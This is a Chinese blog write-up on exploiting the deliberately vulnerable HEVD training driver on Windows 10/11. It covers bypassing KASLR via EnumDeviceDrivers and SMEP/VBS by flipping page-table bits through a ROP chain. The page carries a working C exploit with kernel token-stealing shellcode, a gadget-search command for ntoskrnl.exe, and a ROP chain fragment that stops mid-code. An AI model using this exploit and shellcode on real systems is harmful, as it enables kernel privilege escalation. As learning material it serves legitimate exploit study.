<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="zhaojunqi">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
    <!--- Seo Part-->
    
    <link rel="canonical" href="http://example.com/2025/10/10/绕过windows10-11的保护机制/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
    
    
        
        <meta name="description" content="Hexo Theme Redefine, Redefine Your Hexo Journey.">
<meta property="og:type" content="article">
<meta property="og:title" content="绕过windows10&#x2F;11的保护机制">
<meta property="og:url" content="http://example.com/2025/10/10/%E7%BB%95%E8%BF%87windows10-11%E7%9A%84%E4%BF%9D%E6%8A%A4%E6%9C%BA%E5%88%B6/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="Hexo Theme Redefine, Redefine Your Hexo Journey.">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/images/redefine-og.webp">
<meta property="article:published_time" content="2025-10-10T09:28:13.000Z">
<meta property="article:modified_time" content="2025-10-17T09:31:11.283Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="Windows内核漏洞调试学习">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/redefine-og.webp">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/images/bbb.jpg" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/bbb.jpg">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="/images/bbb.jpg">
    <!--- Page Info-->
    
    <title>
        
            绕过windows10/11的保护机制 | zhaojunqi&#39;s blog
        
    </title>

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">


    <!--- Inject Part-->
    

    
<link rel="stylesheet" href="/css/style.css">


    
        
<link rel="stylesheet" href="/css/build/tailwind.css">

    

    
<link rel="stylesheet" href="/fonts/GeistMono/geist-mono.css">

    
<link rel="stylesheet" href="/fonts/Geist/geist.css">

    <!--- Font Part-->
    
    
    
    
    
    

    <script id="hexo-configurations">
    window.config = {"hostname":"example.com","root":"/","language":"en"};
    window.theme = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true,"delete_mask":false,"title_alignment":"left","headings_top_spacing":{"h1":"3.2rem","h2":"2.4rem","h3":"1.9rem","h4":"1.6rem","h5":"1.4rem","h6":"1.3rem"}},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":[]},"code_block":{"copy":true,"style":"mac","highlight_theme":{"light":"github","dark":"vs2015"},"font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":3,"number":false,"expand":true,"init_open":true},"copyright":{"enable":true,"default":"cc_by_nc_sa"},"lazyload":true,"pangu_js":false,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null,"default_mode":"light"},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null},"title":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"website_counter":{"url":"https://cn.vercount.one/js","enable":true,"site_pv":true,"site_uv":true,"post_pv":true},"single_page":true,"preloader":{"enable":false,"custom_message":null},"open_graph":{"enable":true,"image":"/images/redefine-og.webp","description":"Hexo Theme Redefine, Redefine Your Hexo Journey."},"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"/images/wallhaven-wqery6-light.webp","dark":"/images/wallhaven-wqery6-dark.webp"},"title":"Welcome to zhaojunqi's blog","subtitle":{"text":["谢谢你,一路陪我到这里"],"hitokoto":{"enable":false,"show_author":false,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":100,"backing_delay":1500,"loop":false,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"2.0rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":false,"style":"default","links":{"github":null,"instagram":null,"zhihu":null,"twitter":null,"email":null},"qrs":{"weixin":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null,"lrc":null}]},"mermaid":{"enable":false,"version":"11.4.1"}},"version":"2.8.2","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"width":{"home":"1200px","pages":"1000px"},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"}},"search":{"enable":false,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"show_on_mobile":true,"links":null},"article_date_format":"auto","excerpt_length":200,"categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footerStart":"2022/8/17 11:45:14"};
    window.lang_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
    window.data = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 7.3.0"></head>



<body>
	<div class="progress-bar-container">
	

	
	<span class="pjax-progress-bar"></span>
	<!--        <span class="swup-progress-icon">-->
	<!--            <i class="fa-solid fa-circle-notch fa-spin"></i>-->
	<!--        </span>-->
	
</div>

<main class="page-container" id="swup">

	

	<div class="main-content-container flex flex-col justify-between min-h-dvh">
		<div class="main-content-header">
			<header class="navbar-container px-6 md:px-12">
    <div class="navbar-content transition-navbar ">
        <div class="left">
            
                <a class="logo-image h-8 w-8 sm:w-10 sm:h-10 mr-3" href="/">
                    <img src="/images/bbb.jpg" class="w-full h-full rounded-sm">
                </a>
            
            <a class="logo-title" href="/">
                
                zhaojunqi&#39;s blog
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/"
                                        >
                                    <i class="fa-regular fa-house fa-fw"></i>
                                    HOME
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile sheet -->
    <div class="navbar-drawer h-dvh w-full absolute top-0 left-0 bg-background-color flex flex-col justify-between">
        <ul class="drawer-navbar-list flex flex-col px-4 justify-center items-start">
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/"
                        >
                            <span>
                                HOME
                            </span>
                            
                                <i class="fa-regular fa-house fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            

            
            
        </ul>

        <div class="statistics flex justify-around my-2.5">
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/tags">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">2</div>
        <div class="label text-third-text-color text-sm">Tags</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/categories">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">2</div>
        <div class="label text-third-text-color text-sm">Categories</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/archives">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">14</div>
        <div class="label text-third-text-color text-sm">Posts</div>
    </a>
</div>
    </div>

    <div class="window-mask"></div>

</header>


		</div>

		<div class="main-content-body transition-fade-up">
			

			<div class="main-content">
				<div class="post-page-container flex relative justify-between box-border w-full h-full">
	<div class="article-content-container">

		<div class="article-title relative w-full">
			
			<div class="w-full flex items-center pt-6 justify-start">
				<h1 class="article-title-regular text-second-text-color tracking-tight text-4xl md:text-6xl font-semibold px-2 sm:px-6 md:px-8 py-3">绕过windows10/11的保护机制</h1>
			</div>
			
		</div>

		
		<div class="article-header flex flex-row gap-2 items-center px-2 sm:px-6 md:px-8">
			<div class="avatar w-[46px] h-[46px] flex-shrink-0 rounded-medium border border-border-color p-[1px]">
				<img src="/images/bbb.jpg">
			</div>
			<div class="info flex flex-col justify-between">
				<div class="author flex items-center">
					<span class="name text-default-text-color text-lg font-semibold">zhaojunqi</span>
					
					<span class="author-label ml-1.5 text-xs px-2 py-0.5 rounded-small text-third-text-color border border-shadow-color-1">Lv2</span>
					
				</div>
				<div class="meta-info">
					<div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2025-10-10 17:28:13</span>
        <span class="mobile">2025-10-10 17:28:13</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2025-10-17 17:31:11</span>
            <span class="mobile">2025-10-17 17:31:11</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
        <span class="article-categories article-meta-item">
            <i class="fa-regular fa-folders"></i>&nbsp;
            <ul>
                
                
                    
                        
                        <li>
                            <a href="/categories/Windows%E5%86%85%E6%A0%B8%E6%BC%8F%E6%B4%9E%E8%B0%83%E8%AF%95%E5%AD%A6%E4%B9%A0/">Windows内核漏洞调试学习</a>&nbsp;
                        </li>
                    
                    
                
            </ul>
        </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/Windows%E5%86%85%E6%A0%B8%E6%BC%8F%E6%B4%9E%E8%B0%83%E8%AF%95%E5%AD%A6%E4%B9%A0/">Windows内核漏洞调试学习</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
        <span class="article-pv article-meta-item">
            <i class="fa-regular fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

				</div>
			</div>
		</div>
		

		


		<div class="article-content markdown-body px-2 sm:px-6 md:px-8 pb-8">
			<h1 id="绕过Windows10-11的保护机制（KASLR，SMEP，VBS）"><a href="#绕过Windows10-11的保护机制（KASLR，SMEP，VBS）" class="headerlink" title="绕过Windows10&#x2F;11的保护机制（KASLR，SMEP，VBS）"></a>绕过Windows10&#x2F;11的保护机制（KASLR，SMEP，VBS）</h1><p>   由于有SMEP的存在，最初的想法是修改CR4寄存器的第20位（SMEP通过这个位来启用），可以通过构造ROP链实现，但是由于有VBS的存在（即 “对 CR4 控制寄存器位域（包括 SMEP 字段）的未经授权的修改都会被立即阻止”）所以该用翻转shellcode所在内存页对应的页表条目（PTE），使得该页面被标记为内核页，这样再执行shellcode就可以绕过SMEP，也不会遇到VBS</p>
<p>最终解决：<br>1.构造ROP链翻转页表条目 (PTE) 中与我们的用户模式 shellcode 的内存位置相对应的一个位，U-&gt;K,即由用户态页面转为内核态页面（绕过SMEP）</p>
<p>2.x64的token stealing 的shellcode</p>
<p>3.返回Userland的shellcode</p>
<p>首先直接在windows10上运行oob的demo，即传入3000个‘A’可以成功覆盖返回地址为0x41414141</p>
<p>但是运行windows7中的exp时，发生错误</p>
<div class="code-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdint.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;windows.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> BUFFER_SIZE 4242</span></span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">    HANDLE hHEVD = <span class="literal">NULL</span>;</span><br><span class="line">    LPVOID lpMemory = <span class="literal">NULL</span>;</span><br><span class="line">    DWORD bytesReturned = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    <span class="type">int</span> i = <span class="number">0</span>;</span><br><span class="line">    <span class="type">int</span> shellcodeLength = <span class="number">62</span>;</span><br><span class="line">    <span class="type">int64_t</span> buffer[BUFFER_SIZE] = &#123;<span class="number">0</span>&#125;;</span><br><span class="line"></span><br><span class="line">    <span class="type">char</span> shellcode[] =</span><br><span class="line">    <span class="comment">// python3 sickle.py -p windows/x64/kernel_token_stealer -f c -m pinpoint</span></span><br><span class="line"></span><br><span class="line">    <span class="string">&quot;\x65\x48\xa1\x88\x01\x00\x00\x00\x00\x00\x00&quot;</span> <span class="comment">// movabs rax, qword ptr gs:[0x188]</span></span><br><span class="line">    <span class="string">&quot;\x48\x8b\x80\xb8\x00\x00\x00&quot;</span>                 <span class="comment">// mov rax, qword ptr [rax + 0xb8]</span></span><br><span class="line">    <span class="string">&quot;\x48\x89\xc1&quot;</span>                                 <span class="comment">// mov rcx, rax</span></span><br><span class="line">    <span class="string">&quot;\xb2\x04&quot;</span>                                     <span class="comment">// mov dl, 4</span></span><br><span class="line">    <span class="string">&quot;\x48\x8b\x80\x48\x04\x00\x00&quot;</span>                 <span class="comment">// mov rax, qword ptr [rax + 0x448]</span></span><br><span class="line">    <span class="string">&quot;\x48\x2d\x48\x04\x00\x00&quot;</span>                     <span class="comment">// sub rax, 0x448</span></span><br><span class="line">    <span class="string">&quot;\x38\x90\x40\x04\x00\x00&quot;</span>                     <span class="comment">// cmp byte ptr [rax + 0x440], dl</span></span><br><span class="line">    <span class="string">&quot;\x75\xeb&quot;</span>                                     <span class="comment">// jne 0x1017</span></span><br><span class="line">    <span class="string">&quot;\x48\x8b\x90\xb8\x04\x00\x00&quot;</span>                 <span class="comment">// mov rdx, qword ptr [rax + 0x4b8]</span></span><br><span class="line">    <span class="string">&quot;\x48\x89\x91\xb8\x04\x00\x00&quot;</span>                 <span class="comment">// mov qword ptr [rcx + 0x4b8], rdx</span></span><br><span class="line"></span><br><span class="line">    <span class="string">&quot;\x5d&quot;</span>          <span class="comment">// pop rbp</span></span><br><span class="line">    <span class="string">&quot;\xc2\x08\x00&quot;</span>; <span class="comment">// ret 8</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[*] Getting a handle on HEVD\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    hHEVD = CreateFileA(<span class="string">&quot;\\\\.\\HackSysExtremeVulnerableDriver&quot;</span>,</span><br><span class="line">                        (GENERIC_READ | GENERIC_WRITE),</span><br><span class="line">                        <span class="number">0x00</span>,</span><br><span class="line">                        <span class="literal">NULL</span>,</span><br><span class="line">                        OPEN_EXISTING,</span><br><span class="line">                        FILE_ATTRIBUTE_NORMAL,</span><br><span class="line">                        <span class="literal">NULL</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (hHEVD == INVALID_HANDLE_VALUE)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;[-] Failed to get a handle on HackSysExtremeVulnerableDriver\n&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[*] Allocating RWX memory\n&quot;</span>);</span><br><span class="line">    lpMemory = VirtualAlloc(<span class="literal">NULL</span>,</span><br><span class="line">                            shellcodeLength,</span><br><span class="line">                            (MEM_COMMIT | MEM_RESERVE),</span><br><span class="line">                            PAGE_EXECUTE_READWRITE);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[*] Copying shellcode into RWX memory\n&quot;</span>);</span><br><span class="line">    <span class="built_in">memcpy</span>(lpMemory, shellcode, shellcodeLength);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[*] Spraying return address: 0x%p\n&quot;</span>, lpMemory);</span><br><span class="line">    <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; <span class="number">270</span>; i++)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">/* Spray the return address, who cares about accuracy ;) */</span></span><br><span class="line">        buffer[i] = (<span class="type">int64_t</span>)lpMemory;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[*] Triggering control code 0x222003\n&quot;</span>);</span><br><span class="line">    DeviceIoControl(hHEVD,</span><br><span class="line">                    <span class="number">0x222003</span>,</span><br><span class="line">                    buffer,</span><br><span class="line">                    BUFFER_SIZE,</span><br><span class="line">                    <span class="literal">NULL</span>,</span><br><span class="line">                    <span class="number">0x00</span>,</span><br><span class="line">                    &amp;bytesReturned,</span><br><span class="line">                    <span class="literal">NULL</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p>原因是windows10中有SMEP保护机制</p>
<h2 id="错误尝试——修改CR4寄存器的第20位："><a href="#错误尝试——修改CR4寄存器的第20位：" class="headerlink" title="错误尝试——修改CR4寄存器的第20位："></a>错误尝试——修改CR4寄存器的第20位：</h2><p>为了绕过这个防护机制，首先想到的是修改CR4寄存器的第20位（这个位控制SMEP保护机制是否开启），但是由于不能直接在用户模式内存下执行对应的修改代码，所以需要在内核nt模块中，通过构造ROP链的方式实现该功能，通过调研，发现了一个可以被用来构造ROP的函数：即nt!KeFlushCurrentTbImmediately</p>


<p>通过上图中的调试信息可知，指令mov CR4 rcx相对于nt模块的偏移量为3a0db7</p>
<p>现在，我们需要找到一个 pop rcx; ret 的gadget，将翻转后的 CR4 值放入 RCX。我们可以使用 rp++，这是一个可以搜索搜索目标可执行文件对应的指令的 ROP gadget 。在这里，我们要搜索 ntoskrnl.exe，因为这是 Windows 操作系统的主要内核文件。要做到这一点，你可以使用以下语法</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">rp-win.exe --rop=50 --va=0 --file C:\Windows\System32\ntoskrnl.exe &gt; rop.txt</span><br></pre></td></tr></table></figure></div>

<p><img lazyload src="/images/loading.svg" data-src="https://wetw0rk.github.io/0x01-Killing-Windows-Kernel-Mitigations/pwoershell.png" alt="alt text"></p>
<p><img lazyload src="/images/loading.svg" data-src="https://wetw0rk.github.io/0x01-Killing-Windows-Kernel-Mitigations/confirm.png" alt="alt text"></p>
<p>通过上述方法就可以得到pop rcx；ret这个gadget相对于nt模块的偏移量。</p>
<h1 id="1-获取nt模块的起始地址（绕过KASLR）："><a href="#1-获取nt模块的起始地址（绕过KASLR）：" class="headerlink" title="1.获取nt模块的起始地址（绕过KASLR）："></a>1.获取nt模块的起始地址（绕过KASLR）：</h1><p>接下来由于有KASLR保护措施的存在，所以nt模块加载的地址不确定，所以需要先得到nt模块的起始地址</p>
<p>最后，我使用了一种已知的方法，即利用 EnumDeviceDrivers 获取基址。</p>
<div class="code-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> <span class="title function_">GetKernelBaseAddress</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">    ULONG_PTR pKernelBaseAddress = <span class="number">0</span>;</span><br><span class="line">    LPVOID *lpImageBase = <span class="literal">NULL</span>;</span><br><span class="line">    DWORD dwBytesNeeded = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!EnumDeviceDrivers(<span class="literal">NULL</span>, <span class="number">0</span>, &amp;dwBytesNeeded)) &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;[-] Failed to calculate bytes needed for device driver entries&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!(lpImageBase = (LPVOID *)HeapAlloc(GetProcessHeap(), <span class="number">0</span>, dwBytesNeeded))) &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;[-] Failed to allocate heap for lpImageBase\n&quot;</span>);</span><br><span class="line">        <span class="keyword">if</span> (lpImageBase) &#123;</span><br><span class="line">            HeapFree(GetProcessHeap(), <span class="number">0</span>, lpImageBase);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!EnumDeviceDrivers(lpImageBase, dwBytesNeeded, &amp;dwBytesNeeded)) &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;[-] EnumDeviceDrivers: %d&quot;</span>, GetLastError());</span><br><span class="line">        <span class="keyword">if</span> (lpImageBase) &#123;</span><br><span class="line">             HeapFree(GetProcessHeap(), <span class="number">0</span>, lpImageBase);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    pKernelBaseAddress = ((ULONG_PTR *)lpImageBase)[<span class="number">0</span>];</span><br><span class="line">    HeapFree(GetProcessHeap(), <span class="number">0</span>, lpImageBase);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[*] Kernel Base Address: %llx\n&quot;</span>, pKernelBaseAddress);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> pKernelBaseAddress;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<h3 id="1-函数EnumDeviceDrivers"><a href="#1-函数EnumDeviceDrivers" class="headerlink" title="1.函数EnumDeviceDrivers"></a><strong>1.函数EnumDeviceDrivers</strong></h3><div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">BOOL EnumDeviceDrivers(</span><br><span class="line">  LPVOID  *lpImageBase,  // 接收驱动基址的数组</span><br><span class="line">  DWORD   cb,            // 数组大小（字节）</span><br><span class="line">  LPDWORD lpcbNeeded     // 实际需要的字节数</span><br><span class="line">);</span><br></pre></td></tr></table></figure></div>

<h3 id="2-参数说明"><a href="#2-参数说明" class="headerlink" title="2.参数说明"></a><strong>2.参数说明</strong></h3><table>
<thead>
<tr>
<th align="left">参数</th>
<th align="left">类型</th>
<th align="left">说明</th>
</tr>
</thead>
<tbody><tr>
<td align="left"><code>lpImageBase</code></td>
<td align="left"><code>LPVOID*</code></td>
<td align="left">输出缓冲区，存储驱动基址（每个元素是一个 <code>LPVOID</code>，指向驱动基址）。</td>
</tr>
<tr>
<td align="left"><code>cb</code></td>
<td align="left"><code>DWORD</code></td>
<td align="left">缓冲区大小（字节）。</td>
</tr>
<tr>
<td align="left"><code>lpcbNeeded</code></td>
<td align="left"><code>LPDWORD</code></td>
<td align="left">返回实际需要的字节数（如果缓冲区太小，会返回所需大小）。</td>
</tr>
</tbody></table>
<h3 id="3-返回值"><a href="#3-返回值" class="headerlink" title="3.返回值"></a><strong>3.返回值</strong></h3><ul>
<li><strong>成功</strong>：返回 <code>非零值</code>。</li>
<li><strong>失败</strong>：返回 <code>0</code>，可通过 <code>GetLastError()</code> 获取错误代码。</li>
</ul>
<hr>
<h3 id="4-函数功能"><a href="#4-函数功能" class="headerlink" title="4.函数功能"></a><strong>4.函数功能</strong></h3><ul>
<li><strong>枚举所有已加载的内核驱动</strong>（包括 <code>ntoskrnl.exe</code>、<code>win32k.sys</code> 等）。</li>
<li><strong>返回每个驱动的基址</strong>（加载地址），存储在 <code>lpImageBase</code> 数组中。</li>
<li>**第一个基址（<code>lpImageBase[0]</code>）是 <code>ntoskrnl.exe</code>**（Windows 内核主模块），因为内核总是最先加载。</li>
</ul>
<p>不过通过该方法也会遇到一种新内存保护。我们遇到了基于虚拟化的安全（VBS），这意味着 “任何对 CR4 控制寄存器位域（包括 SMEP 字段）的未经授权的修改都会被立即阻止”。所以上述方法行不通，得换路</p>
<h3 id="新的方式绕过SMEP："><a href="#新的方式绕过SMEP：" class="headerlink" title="新的方式绕过SMEP："></a>新的方式绕过SMEP：</h3><p>在对其他人的做法进行了一番研究后，我们的想法是翻转页表条目 (PTE) 中与我们的用户模式 shellcode 的内存位置相对应的一个位。</p>
<p>基本上，SMEP 是通过 U&#x2F;S PTE 控制位按内存执行的。让我们看看 WinDbg 中有关用户模式 shellcode 分配的 !pte 输出，以尝试理解页表入口权限。</p>
<p>注：<br>解决了调试的时候一直闪退的问题：原因是增强会话模式，切换到基本会话模式就好了，然后在用vs执行pwn2_demo.cpp的时候，需要在windbg中把断点下在bu HEVD! TriggerBufferOverflowStack 处，而不是bu HEVD！DriverEntry处</p>


<p>​                                                            上图为通过动态调试，修改shellcode所在页的页表的图</p>
<p>从理论上动态调试完以后，接下来是用构造ROP链的方式来实现修改shellcode所在页的页表权限位的功能</p>
<h1 id="2-用ROP链实现修改shellcode所在页的权限信息（绕过SMEP和VBS）："><a href="#2-用ROP链实现修改shellcode所在页的权限信息（绕过SMEP和VBS）：" class="headerlink" title="2.用ROP链实现修改shellcode所在页的权限信息（绕过SMEP和VBS）："></a>2.用ROP链实现修改shellcode所在页的权限信息（绕过SMEP和VBS）：</h1><div class="code-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Prepare RDX register for later. This is needed for the XOR operation */</span></span><br><span class="line"> buffer[i++] = kernel_base + <span class="number">0x3f99ce</span>; <span class="comment">// pop rdx ; pop rax ; pop rcx ; ret [nt]</span></span><br><span class="line"> 